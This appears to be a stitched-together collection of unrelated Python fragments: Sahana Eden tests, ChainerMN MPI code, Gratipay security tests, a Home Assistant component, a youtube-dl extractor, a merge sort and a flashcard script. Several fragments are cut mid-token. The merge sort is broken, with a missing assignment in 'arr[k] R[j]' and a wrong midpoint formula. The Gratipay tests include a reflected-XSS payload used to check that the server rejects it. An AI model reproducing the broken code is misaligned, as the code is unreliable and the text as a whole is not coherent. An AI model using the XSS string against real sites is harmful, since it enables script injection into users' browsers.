============================================== class S3ExtractLazyFKRepresentationTests(unittest.TestCase): """ Test lazy representation of foreign keys in datatables """ tablename = "export_lazy_fk_represent" # ------------------------------------------------------------------------- @classmethod def setUpClass(cls): db = current.db db.define_table(cls.tablename, Field("location_id", "reference gis_location"), Field("organisation_id", "reference org_organisation"), Field("facility_type_id", "list:reference org_facility_type"), *s3_meta_fields()) # ------------------------------------------------------------------------- def setUp(self): tablename = self.tablename s3db = current.s3db table = s3db[tablename] s3db.add_components("org_organisation", **{tablename: {"name": "test", "joinby": "organisation_id", }, } ) current.auth.override = True # Create locations locations = (Storage(name="FK Represent TestLocation 1"), Storage(name="FK Represent TestLocation 2")) ltable = s3db.gis_location for i in xrange(len(locations)): location = locations[i] location_id = ltable.insert(**location) location["id"] = location_id self.locations = locations # Create facility types fac_types = (Storage(name="FK Represent TestFacType P"), Storage(name="FK Represent TestFacType Q"), Storage(name="FK Represent TestFacType R")) ttable = s3db.org_facility_type for i in xrange(len(fac_types)): fac_type = fac_types[i] fac_type_id = ttable.insert(**fac_type) fac_type["id"] = fac_type_id self.fac_types = fac_types # Create organisation org = Storage(name="FK Represent TestOrg A") otable = s3db.org_organisation org_id = otable.insert(**org) org["id"] = org_id s3db.update_super(otable, org) self.org = org # Create test records facs = (Storage(organisation_id=org.id, facility_type_id=[fac_types[0].id, fac_types[1].id], location_id=locations[0].id), Storage(organisation_id=org.id, facility_type_id=[fac_types[1].id, fac_types[2].id], location_id=locations[1].id)) for i in xrange(len(facs)): fac = facs[i] fac_id = table.insert(**fac) fac["id"] = fac_id self.facs = facs # ------------------------------------------------------------------------- def testRepresentReferenceSingleNoLinkto(self): """ Test Representation of reference, single value, without linkto """ s3db = current.s3db tablename = self.tablename fname = "%s.organisation_id" % tablename fac = self.facs[0] resource = s3db.resource(tablename, id=fac.id) renderer = S3Represent(lookup="org_organisation") table = resource.table table.organisation_id.represent = renderer data = resource.select(["id", "organisation_id"], limit=None, represent=True) result = data["rows"] self.assertEqual(renderer.queries, 1) self.assertTrue(isinstance(result, list)) self.assertEqual(len(result), 1) output = result[0] self.assertTrue(isinstance(output, Storage)) self.assertTrue(fname in output) self.assertEqual(output[fname], self.org.name) # ------------------------------------------------------------------------- def testRepresentReferenceSingleLinktoOn(self): """ Test Representation of reference, single value, with linkto """ s3db = current.s3db tablename = self.tablename fname = "%s.organisation_id" % tablename fac = self.facs[0] resource = s3db.resource(tablename, id=fac.id) renderer = S3Represent(lookup="org_organisation", #linkto=URL(c="org", f="organisation", args=["[id]"]), show_link=True) table = resource.table table.organisation_id.represent = renderer data = resource.select(["id", "organisation_id"], limit=None, represent=True) result = data["rows"] self.assertEqual(renderer.queries, 1) self.assertTrue(isinstance(result, list)) self.assertEqual(len(result), 1) output = result[0] self.assertTrue(isinstance(output, Storage)) self.assertTrue(fname in output) representation = output[fname] self.assertTrue(isinstance(representation, A)) self.assertEqual(representation.attributes["_href"], "/%s/org/organisation/%s" % (current.request.application, self.org.id)) self.assertEqual(representation.components[0], self.org.name) # ------------------------------------------------------------------------- def testRepresentReferenceSingleLinktoOff(self): """ Test Representation of reference, single value, with linkto + show_link=False """ s3db = current.s3db tablename = self.tablename fname = "%s.organisation_id" % tablename fac = self.facs[0] resource = s3db.resource(tablename, id=fac.id) renderer = S3Represent(lookup="org_organisation", linkto=URL(c="org", f="organisation", args=["[id]"])) table = resource.table table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"], limit=None, represent=True,
show_links=False) result = data["rows"] self.assertEqual(renderer.queries, 1) self.assertTrue(isinstance(result, list)) self.assertEqual(len(result), 1) output = result[0] self.assertTrue(isinstance(output, Storage)) self.assertTrue(fname in output) self.assertEqual(output[fname], self.org.name) # ------------------------------------------------------------------------- def testRepresentReferenceMultipleNoLinkto(self): """ Test Representation of reference, multiple values, without linkto """ s3db = current.s3db tablename = self.tablename fname = "%s.location_id" % tablename ftable = current.db[tablename] renderer = S3Represent(lookup="gis_location") ftable.location_id.represent = renderer resource = s3db.resource("org_organisation", id=self.org.id) data = resource.select(["id", "test.location_id"], limit=None, represent=True) result = data["rows"] self.assertEqual(renderer.queries, 1) self.assertTrue(len(result), 1) output = result[0] self.assertTrue(fname in output) names = output[fname].split(", ") self.assertEqual(len(names), 2) self.assertTrue(self.locations[0].name in names) self.assertTrue(self.locations[1].name in names) # ------------------------------------------------------------------------- def testRepresentReferenceMultipleLinktoOn(self): """ Test Representation of reference, multiple values, with link
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals from argparse import ArgumentParser from .core import Core def getopt(argv): parser = ArgumentParser(description='Another webui for youtube-dl') parser.add_argument('-c', '--config', metavar="CONFIG_FILE", h
elp="config file") parser.add_argum
ent('--host', metavar="ADDR", help="the address server listens on") parser.add_argument('--port', metavar="PORT", help="the port server listens on") return vars(parser.parse_args()) def main(argv=None): from os import getpid print("pid is {}".format(getpid())) print("-----------------------------------") cmd_args = getopt(argv) core = Core(cmd_args=cmd_args) core.start()
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)], root) ys = [rbuf[i:i + l].reshape(s) for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)] return tuple(ys) else: sbuf = _memory_utility.array_to_buffer_object( x, _get_mpi_type(msgtype)) self.mpi_comm.Gatherv(sbuf, None, root) return None def allgather(self, x): chainer.utils.experimental( 'chainermn.communicators.MpiCommunicatorBase.allgather') msgtype = _MessageType(x) _check_dtype('allgather', msgtype) msgtypes = self.mpi_comm.allgather(msgtype) _check_dtypes_are_same(msgtypes) # Type check. for msgtype in msgtypes: if msgtype.is_tuple: raise TypeError('allgather cannot handle tuple data') assert len(msgtype.shapes) == 1 # Collective communication. xp = chainer.backend.get_array_module(x) shapes = [msgtype.shapes[0] for msgtype in msgtypes] sbuf = _memory_utility.array_to_buffer_object( x, _get_mpi_type(msgtype)) rlens = [chainer.utils.size_of_shape(s) for s in shapes] rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype) if xp is not numpy: chainer.cuda.Stream.null.synchronize() self.mpi_comm.Allgatherv( sbuf, [_memory_utility.get_device_memory_pointer(rbuf), (rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)]) ys = [rbuf[i:i + l].reshape(s) for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)] return tuple(ys) def allreduce(self, x): """A primitive of inter-process allreduce communication. This method tries to invoke allreduce communication within the communicator. All processes in the communicator are expected to invoke ``allreduce()``. This method relies on mpi4py fast communication optimized for numpy arrays, as well as ``send()`` and ``recv()``. Note that this method can only handle the same shapes of data over all processes, and cannot handle tuple data. If ``x`` is numpy array, the received data will also be allocated as numpy array. Additionally, when ``x`` is cupy array, the returned array will be placed at current device (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``) regardless of which device the argument is placed at remote nodes. Args: x (numpy/cupy array): An array to apply allreduce operation. Returns: ys (numpy/cupy array): An array that allreduce (currently SUM only) has been applied. """ msgtype = _MessageType(x) _check_dtype('allreduce', msgtype) if msgtype.is_tuple: raise TypeError('allreduce cannot handle tuple data') xp = chainer.backend.get_array_mo
dule(x) # TODO(kuenishi): do we check all messages have same shape and dims? # Source buffer sbuf = _memory_utility.array_to_buffer_object( x, _get_mpi_type(msgtype)) # Destination buffer and its object shape = msgtype.shapes[0] dbuf = xp.empty( [chain
er.utils.size_of_shape(shape)], dtype=msgtype.dtype) dbuf_buffer_obj = _memory_utility.array_to_buffer_object( dbuf, _get_mpi_type(msgtype)) self.mpi_comm.Allreduce(sbuf, dbuf_buffer_obj) return dbuf.reshape(shape) def scatter(self, xs, root=0): """A primitive of inter-process scatter communication. This method tries to invoke scatter communication within the communicator. All processes in the communicator are expected to invoke ``scatter()``. This method relies on mpi4py fast communication optimized for numpy arrays, as well as ``send()`` and ``recv()``. If ``xs`` is tuple, each element is send to different processes. The length of the tuple must be the same as the communicator size. If ``xs`` is ``numpy.ndarrray``, it is splitted with the first axis and sent to different processes. For slave processes, ``xs`` is allowed to be any value (will be ignored). If ``scatter()`` is invoked with cupy array in the root process, the returned array will be placed at current device (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``) regardless of which device the argument is placed at remote nodes. Args: xs (tuple of numpy/cupy array): Arrays to be scattered. root (int): Rank of root process. Returns: ys (numpy/cupy array): Received arrays. """ chainer.utils.experimental( 'chainermn.communicators.CommunicatorBase.scatter') is_master = self.mpi_comm.rank == root if is_master: # Type check. msgtype = _MessageType(xs) _check_dtype('scatter', msgtype) if msgtype.is_tuple: if len(msgtype.shapes) != self.size: raise ValueError( 'the length of xs must be consistent ' 'with communicator size') xp = chainer.backend.get_array_module(*xs) msgtype = tuple([_MessageType(x) for x in xs]) shapes = [mty.shapes[0] for mty in msgtype] # concatenate([x.reshape(-1) ... ], axis=0) will fail xs = xp.concatenate([x.reshape(1, -1) for x in xs], axis=1) else: assert len(msgtype.shapes) == 1 if msgtype.shapes[0][0] != self.mpi_comm.size: raise ValueError( 'scatter received inconsistent number of inputs ' 'with communicator size') xp = chainer.backend.get_array_module(xs) msgtype = tuple([_MessageType(xs[0]) for _ in range(self.size)]) shapes = [xs.shape[1:] for _ in range(self.size)] msgtype = self.mpi_comm.scatter(msgtype, root) shape = msgtype.shapes[0] # Collective communication. slens = [chainer.utils.size_of_shape(s) for s in shapes] sbuf = _memory_utility.get_device_memory_pointer(xs) rbuf = xp.empty( [chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype) rtype = _get_mpi_type(msgtype) if xp is not numpy: chainer.cuda.Stream.null.synchronize() self.mpi_comm.Scatterv( [sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(msgtype)], _memory_utility.array_to_buffer_object(rbuf, rtype), root) return rbuf.reshape(shape) else: # slave processes msgtypes = self.mpi_comm.scatter(None, root) xp = msgtypes.get_array_module() shape = msgtypes.shapes[0] rbuf = xp.empty( [chainer.utils.size_of_shape(shape)], dtype=msgtypes.dtype) rtype = _get_mpi_type(msgtypes) self.mpi_comm.Scatterv( None, _memory_utility.array_to_buffer_object(rbuf, rtype), root) return rbuf.reshape(shape) # Objects def send_obj(self, obj, dest, tag=0): self.mpi_comm.send(obj, dest=dest, tag=tag) def recv_obj(self, source, status=None, tag=mpi4py.MPI.ANY_TAG): return self.mpi_comm.recv(source=source, status=status, tag=tag) def bcast_obj(self, obj, max_buf_len=256 * 1024 * 1024, root=0): return chunked_bcast_obj(obj, self.mpi_comm, max_buf_len=max_buf_len, root=root) def gather_obj(self, obj, root=0): return self.mpi_comm.gather(obj, root=root) def allreduce_obj(self, obj): # Summation by default return self.mpi_comm.allreduce(obj) def bcast
from __future__ import absolute_import, division, print_function, unicode_literals import struct import datetime from aspen import Response from aspen.http.request import Request from base64 import urlsafe_b64decode from cryptography.fernet import Fernet, InvalidToken from gratipay import security from gratipay.models.participant import Identity from gratipay.security.crypto import EncryptingPacker from gratipay.testing import Harness from pytest import raises class RejectNullBytesInURI(Harness): def test_filters_path(self): assert self.client.GxT('/f%00/').code == 400 def test_filters_querystring(self): assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400 def test_protects_against_reflected_xss(self): self.make_package() assert self.client.GET('/on/npm/foo').code == 200 assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400 assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi class OnlyAllowCertainMethodsTests(Harness): def test_is_installed_properly(self): assert self.client.hxt('TRaCE', '/').code == 405 def test_allows_certain_methods(self): for allowed in ('GEt', 'HEaD', 'PosT'): request = Request(allowed) assert security.only_allow_certain_methods(request) is None def test_disallows_a_bunch_of_other_stuff(self): for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'): request = Request(disallowed) response = raises(Response, security.only_allow_certain_methods, request).value assert response.code == 405 def test_doesnt_choke_error_handling(self): assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405 def test_prevents_csrf_from_choking(self): assert self.client.PxST('/assets/gratipay.css').code == 405 class AddHeadersToResponseTests(Harness): def test_sets_x_frame_options(self): headers = self.client.GET('/about/').headers assert headers['X-Frame-Options'] == 'SAMEORIGIN' def test_sets_x_content_type_options(self): headers = self.client.GET('/about/').headers assert headers['X-Content-Type-Options'] == 'nosniff' def test_sets_x_xss_protection(self): headers = self.client.GET('/about/').headers assert headers['X-XSS-Protection'] == '1; mode=block' def test_sets_referrer_policy(self): headers = self.client.GET('/about/').headers assert headers['Referrer-Policy'] == \ 'no-referrer-when-downgrade, strict-origin-when-cross-origin' def test_sets_strict_transport_security(self): headers = self.client.GET('/about/').headers assert headers['strict-transport-security'] == 'max-age=31536000' def test_doesnt_set_content_security_policy_by_default(self): assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers def test_sets_content_security_policy(self): with self.setenv(CSP_REPORT_URI='http://cheese/'): headers = self.client.GET('/about/').headers policy = ( "default-src 'self';" "script-src 'self' assets.gratipay.com 'unsafe-inline';" "style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com" " 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';" "img-src *;" "font-src 'self' assets.gratipay.com cloud.typography.com data:;" "block-all-mixed-content;" "report-uri http://cheese/;" ) assert headers['content-security-policy-report-only'] == policy class EncryptingPackerTests(Harness): packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\ b'5TdyoJsll5nMAicg==' def test_packs_encryptingly(self): packed = Identity.encrypting_packer.pack({"foo": "bar"}) assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet versio
n def test_unpacks_decryptingly(self): assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_fails_to_unpack_old_data_with_a_new_key(self): encrypting_packer = EncryptingPacker(Fe
rnet.generate_key()) raises(InvalidToken, encrypting_packer.unpack, self.packed) def test_can_unpack_if_old_key_is_provided(self): old_key = str(self.client.website.env.crypto_keys) encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key) assert encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_leaks_timestamp_derp(self): # https://github.com/pyca/cryptography/issues/2714 timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted! assert datetime.datetime.fromtimestamp(timestamp).year == 2016 def test_demands_bytes(self): raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer')) raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
# -*- coding: utf-8 -*- from __futu
re__ import unicode_literals from django.shortcuts import render from django.conf.urls import url from .views import HomePageView, LeaderboardView, MiscView, Sign_upView urlpatterns = [ url(r'^$', HomePageView.as_view(), name='home'), url(r'^misc$', MiscView.as_view(), name='misc'), url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'), url(r'^login$', Sign_upView.as_view(), name='login')
, ]
# -*- coding: utf-8 -*- from __future__ import print_function import pytak.call as call import pytak.runners.tools as tools from fakeapi import CreateTag from fakeapi import GetInformationAboutYourself from fakeapi import CreateAPost new_request_body = { "title" : "New Employee [XXXXX]", "body" : "Please welcome our new employee. Pytak tag - [DDDD]", "type" : "TEXT", "permissions" : { "principal" : { "id" : "12345", "resource" : "http://example.com/schema/1.0/user" }, "permissionFlags" : { "view" : "true", "edit" : "false", "comment" : "true", "share" : "true", "authorize" :"false" } }, "tags" : [ {"name" : "tag2" }, { "name" : "tag3" }, { "name" : "tag4" } ] } def test_randomize_text(): txt = "JSON value with [XXXX] and [DDDD]" assert txt != call.randomize_text(txt) def test_random_int_leght(): dig = call.__get_random_int(4) assert len(str(dig)) == 4 def test_random_alphanum_leght(): alphnum = call.__get_random_alphanumeric(4) assert len(alphnum) == 4 def test_api_object_request_body_creation(): ct = CreateTag() ct2 = CreateTag(assign={'name':'first'}) assert ct.request_body == ct2.request_body def test_api_object_request_body_manipulation_with_empty(): ct = CreateTag() ct2 = CreateTag(assign={'name':'second'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_api_object_request_body_manipulation_with_change(): ct = CreateTag(assign={'name':'one'}) ct2 = CreateTag(assign={'name':'two'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_url_rewrite(): your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName" assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName" def test_request_body_rewrite():
CreateAPost() << new_request_body def test_assign_randomization(): create_tag = CreateTag(assign={"name" : "pytak-[XXXX]"}) assert create_tag.assign != {"name" : "pytak-[XXXX]"} def test_request_body_randomization(): create_post = CreateAPost
() << new_request_body print(create_post.request_body)
class Solution(object): def containsNearbyAlmostDuplicate(self, nums, k, t): """ :type nums: List[int] :type k: int :type t: int :rtype: bool """ if k < 1 or t < 0: return False dic = {} t += 1 for i in range(len(nums)): if i > k: del dic[nums[i - k - 1] // t] m = nums[i] // t if m in dic: return True if m - 1 in dic and abs
(nums[i] - dic[m - 1]) < t: return True if m + 1 in dic and abs(nums[i] - dic[m + 1]) < t: return True dic[m] = nums[i] return False test = Solution() print(test.containsNearbyAlmostDupl
icate([1, 3, 1], 1, 1))
ON_TITLE = "Wireless Sensor Tag Setup" DOMAIN = "wirelesstag" DEFAULT_ENTITY_NAMESPACE = "wirelesstag" # Template for signal - first parameter is tag_id, # second, tag manager mac address SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}" # Template for signal - tag_id, sensor type and # tag manager mac address SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) }, extra=vol.ALLOW_EXTRA, ) class WirelessTagPlatform: """Principal object to manage all registered in HA tags.""" def __init__(self, hass, api): """Designated initializer for wirelesstags platform.""" self.hass = hass self.api = api self.tags = {} self._local_base_url = None @property def tag_manager_macs(self): """Return list of tag managers mac addresses in user account.""" return self.api.mac_addresses def load_tags(self): """Load tags from remote server.""" self.tags = self.api.load_tags() return self.tags def arm(self, switch): """Arm entity sensor monitoring.""" func_name = f"arm_{switch.sensor_type}" arm_func = getattr(self.api, func_name) if arm_func is not None: arm_func(switch.tag_id, switch.tag_manager_mac) def disarm(self, switch): """Disarm entity sensor monitoring.""" func_name = f"disarm_{switch.sensor_type}" disarm_func = getattr(self.api, func_name) if disarm_func is not None: disarm_func(switch.tag_id, switch.tag_manager_mac) def make_notifications(self, binary_sensors, mac): """Create configurations for push notifications.""" _LOGGER.info("Creating configurations for push notifications.") configs = [] bi_url = self.binary_event_callback_url for bi_sensor in binary_sensors: configs.extend(bi_sensor.event.build_notifications(bi_url, mac)) update_url = self.update_callback_url update_config = NC.make_config_for_update_event(update_url, mac) configs.append(update_config) return configs def install_push_notifications(self, binary_sensors): """Register local push notification from tag manager.""" _LOGGER.info("Registering local push notifications.") for mac in self.tag_manager_macs: configs = self.make_notifications(binary_sensors, mac) # install notifications for all tags in tag manager # specified by mac result = self.api.install_push_notification(0, configs, True, mac) if not result: self.hass.components.persistent_notification.create( "Error: failed to install local push notifications <br />", title="Wireless Sensor Tag Setup Local Push Notifications", notification_id="wirelesstag_failed_push_notification", ) else: _LOGGER.info( "Installed push notifications for all\ tags in %s.", mac, ) @property def local_base_url(self): """Define base url of hass in local network.""" if self._local_base_url is None: self._local_base_url = "http://{}".format(util.get_local_ip()) port = self.hass.config.api.port if port is not None: self._local_base_url += f":{port}" return self._local_base_url @property def update_callback_url(self): """Return url for local push notifications(update event).""" return f"{self.local_base_url}/api/events/wirelesstag_update_tags" @property def binary_event_callback_url(self): """Return url for local push notifications(binary event).""" return f"{self.local_base_url}/api/events/wirelesstag_binary_event" def handle_update_tags_event(self, event): """Handle push event from wireless tag manager.""" _LOGGER.info("push notification for update arrived: %s", event) try: tag_id = event.data.get("id") mac = event.data.get("mac") dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag update event:\ %s error: %s", str(event), str(ex), ) def handle_binary_event(self, event): """Handle push notifications for binary (on/off) events.""" _LOGGER.info("Push notification for binary event arrived: %s", event) try: tag_id = event.data.get("id") event_type = event.data.get("type") mac = event.data.get("mac") dispatcher_send( self.hass, SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac), event, ) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag binary event:\ %s error: %s", str(event), str(ex), ) def setup(hass, config): """Set up the Wireless Sensor Tag component.""" conf = config[DOMAIN] username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) try: from wirelesstagpy import WirelessTags, WirelessTagsException wirelesstags = WirelessTags(username=username, password=password) platform = WirelessTagPlatform(hass, wirelesstags) platform.load_tags() hass.data[DOMAIN] = platform except (ConnectTimeout, HTTPError, WirelessTagsException) as ex: _LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex)) hass.components.persistent_notification.create( "Error: {}<br />" "Please restart hass after fixing this." "".format(ex), title=NOTIFICATION_TITLE, notification_id=NOTIFICATION_ID, ) return False # listen to custom events hass.bus.listen( "wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event
) hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event) return True class WirelessTagBaseSensor(Entity): """Base class for HA implementation for Wireless Sensor Tag.""" def __init__(self, api, tag): """Initialize a base sensor for Wireless Sensor Tag platform.""" self._api = api self._tag = tag self._uuid = self._tag.uuid self.tag_id = self._tag.tag_id self.ta
g_manager_mac = self._tag.tag_manager_mac self._name = self._tag.name self._state = None @property def should_poll(self): """Return the polling state.""" return True @property def name(self): """Return the name of the sensor.""" return self._name @property def principal_value(self): """Return base value. Subclasses need override based on type of sensor. """ return 0 def updated_state_value(self): """Return formatted value. The default implementation formats principal value. """ return self.decorate_value(self.principal_value) # pylint: disable=no-self-use def decorate_value(self, value): """Decorate input value to be well presented for end user.""" return f"{value:.1f}" @property def available(self): """Return True if entity is available.""" return self._tag.is_alive def update(self): """Update state.""" if not self.should_poll: return updated_tags = self._api.load_tags() updated_tag = updated_tags[self._uuid] if updated_tag is None: _LOGGER.er
''' Python program for implementation of Merge Sort l is left index, m is middle index and r is right index L[l...m] and R[m+1.....r] are respective left and right sub-arrays ''' def merge(arr, l, m, r): n1 = m - l + 1 n2 = r-m #create temporary arrays L = [0]*(n1) R = [0]*(n2) #Copy data to temp arrays L[] and R[] for i in range(0, n1): L[i] = arr[l + i] for j in range(0, n2): R[j] = arr[m+1+j] # Merge the temp array back into arr[l...r] i = 0 # Initial index of first subarray j = 0 # Initial index of second subarray k = l # Initial index of merged subarray #Comparing the elements of the array and filling them into one array while i < n1 and j < n2 : if L[i] <= R[j] : arr[k] = L[i] i += 1 else: arr[k] = R[j] j += 1 k += 1 # C
opy the remaining element of L[], if there are any while i < n1: arr[k] = L[i] i += 1 k += 1 # Copy the remaining element of R[], if there are any while j < n2: arr[k] R[j] j += 1 k += 1 # l is for left index and r is for right index of the # subarray of arr to be sorted def mergeSort(arr, l,
r): if l < r: #Same as (l+r)/2, but avoid overflow for large l and h m = (l+(r-1))/2 # Sort first and second halves mergeSort(arr, l, m) mergeSort(arr, m+1, r) merge(arr, l, m, r)
# coding: utf-8 from __future__ import unicode_literals import re from .adobepass import AdobePassIE from ..utils import ( int_or_none, determine_ext, parse_age_limit, urlencode_postdata, ExtractorError, ) class GoIE(AdobePassIE): _SITE_INFO = { 'abc': { 'brand': '001', 'requestor_id': 'ABC', }, 'freeform': { 'brand': '002', 'requestor_id': 'ABCFamily', }, 'watchdisneychannel': { 'brand': '004', 'requestor_id': 'Disney', }, 'watchdisneyjunior': { 'brand': '008', 'requestor_id': 'DisneyJunior', }, 'watchdisneyxd': { 'brand': '009', 'requestor_id': 'DisneyXD', } } _VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys()) _TESTS = [{ 'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx', 'info_dict': { 'id': '0_g86w5onx', 'ext': 'mp4', 'title': 'Sneak Peek: Language Arts', 'description': 'md5:7dcdab3b2d17e5217c953256af964e9c', }, 'params': { # m3u8 download 'skip_download': True, }, }, { 'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601', 'only_matching': True, }] def _real_extract(self, url): sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups() if not video_id: webpage = self._download_webpage(url, display_id) video_id = self._search_regex( # There may be inner quotes, e.g. data-video-id="'VDKA3609139'" # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id') site_info = self._SITE_INFO[sub_domain] brand = site_info['brand'] video_data = self._download_json( 'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id), video_id)['video'][0] title = video_data['title'] formats = [] for asset in video_data.get('assets', {}).get('asset', []): asset_url = asset.get('value') if not asset_url: continue format_id = asset.get('format') ext = determine_ext(asset_url) if ext == 'm3u8': video_type = video_data.get('type') if video_type == 'lf': data = { 'video_id': video_data['id'], 'video_type': video_type, 'brand': brand, 'device': '001', } if video_data.get('accesslevel') == '1
': requestor_id = site_info['requestor_id'] resource = self._get_mvpd_resource( requestor_id, title, video_id, None) auth = self._extract_mvpd_auth( url, video_id, requestor_id, resource) data.update({ 'token': auth, 'token_typ
e': 'ap', 'adobe_requestor_id': requestor_id, }) entitlement = self._download_json( 'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json', video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers()) errors = entitlement.get('errors', {}).get('errors', []) if errors: error_message = ', '.join([error['message'] for error in errors]) raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True) asset_url += '?' + entitlement['uplynkData']['sessionKey'] formats.extend(self._extract_m3u8_formats( asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False)) else: formats.append({ 'format_id': format_id, 'url': asset_url, 'ext': ext, }) self._sort_formats(formats) subtitles = {} for cc in video_data.get('closedcaption', {}).get('src', []): cc_url = cc.get('value') if not cc_url: continue ext = determine_ext(cc_url) if ext == 'xml': ext = 'ttml' subtitles.setdefault(cc.get('lang'), []).append({ 'url': cc_url, 'ext': ext, }) thumbnails = [] for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []): thumbnail_url = thumbnail.get('value') if not thumbnail_url: continue thumbnails.append({ 'url': thumbnail_url, 'width': int_or_none(thumbnail.get('width')), 'height': int_or_none(thumbnail.get('height')), }) return { 'id': video_id, 'title': title, 'description': video_data.get('longdescription') or video_data.get('description'), 'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000), 'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')), 'episode_number': int_or_none(video_data.get('episodenumber')), 'series': video_data.get('show', {}).get('title'), 'season_number': int_or_none(video_data.get('season', {}).get('num')), 'thumbnails': thumbnails, 'formats': formats, 'subtitles': subtitles, }
#!/usr/bin/env python3 # Review Lines from the Selected Deck in Random Order Until All Pass # Written in 2012 by 伴上段 # # To the extent possible under law, the author(s) have dedicated all copyright # and related and neighboring rights to this software to the public domain # worldwide. This software is distributed without any warranty. # # You should have received a copy of the CC0 Public Domain Dedication along # with this software. If not, see # <http://creativecommons.org/publicdomain/zero/1.0/>. from argparse import * from csv import * from datetime import * from os.path import * from random import * from sys import * def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2): ret = 0 if isinstance(deckfile, str) and not exists(deckfile): stderr.write("deck file does not exist: " + deckfile + "\n") ret = 1 if not exists(logfile): stderr.write("log file does not exist: " + logfile + "\n") ret = 1 if not exists(commandfile): stderr.write("command file (pipe?) does not exist: " + commandfile + "\n") ret = 1 if ret != 0: return 1; reviewing_cards = [] failed_cards = [] deckf = None try: deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile) for fields in reader(deckf, delimiter=field_sep): if len(fields) != 0: reviewing_cards.append([fields[0], field_sep.join(fields), False]) finally: if deckf is not None: deckf.close() def logreview(logf, card, command): logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command) sm2_commands = set(str(v) + "\n" for v in range(6)) shuffle(reviewing_cards) with open(commandfile, 'r') as commandf: with open(logfile, 'a') as logf: while reviewing_cards or failed_cards: if not reviewing_cards: reviewing_cards, failed_cards = failed_cards, reviewing_cards shuffle(reviewing_cards) card = reviewing_cards.pop() stdout.write(card[1] + "\n") stdout.flush() command = commandf.readline() if use_sm2: if command in sm2_commands: if not (is_dry_run or card[-1]): logreview(logf, card, command) if int(command[0:1]) < 3: card[-1] = True failed_cards.append(card) elif command == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 else: # Leitner system if command == "+\n": if not (is_dry_run or card[-1]): logreview(logf, card, "+\n") elif command == "-\n": if not is_dry_run: logreview(logf, card, "-\n") card[-1] = True failed_cards.append(card) elif command.lower() == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 logf.flush() return 0 if __name__ == "__main__": parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards and log the results. Both standard input and the specified log file must be CSV files with the same field separator character, which is specified via -s. This program works with either the Leitner system or the SuperMemo algorithm, version 2 (SM-2). formatting: This program treats the first field of each nonempty line from the deck as that line's unique 